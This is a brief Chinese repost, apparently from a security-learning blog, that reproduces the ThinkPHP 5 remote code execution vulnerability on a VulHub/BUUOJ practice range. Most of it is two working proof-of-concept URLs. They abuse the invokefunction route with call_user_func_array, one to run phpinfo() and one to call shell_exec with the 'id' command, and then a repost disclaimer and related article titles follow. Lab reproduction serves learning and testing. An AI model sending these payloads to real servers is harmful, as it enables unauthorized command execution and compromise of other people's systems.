本文轉載自查看原文 2019-12-25 11:51 904 [ThinkPHP]5-Rce/ ThinkPHP/ poc/ VulHub/ 5-Rce/ exp

靶場首頁

構造POC

該poc會執行phpinfo()

http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1  # 將執行phpinfo()

該poc將會執行id命令

http://node3.buuoj.cn:25181/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=id

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 [ThinkPHP]5.0.23-Rce Thinkphp5 RCE總結 ThinkPhp之Rce分析 thinkphp 5.1框架利用&rce分析 ThinkPHP5 RCE在PHP7下getshell thinkphp5.x系列 RCE總結 [ThinkPHP]5.0.23-Rce 漏洞復現炒冷飯之ThinkPHP3.2.X RCE漏洞分析 Thinkphp 5.0.x 變量覆蓋導致的RCE 漏洞分析 RCE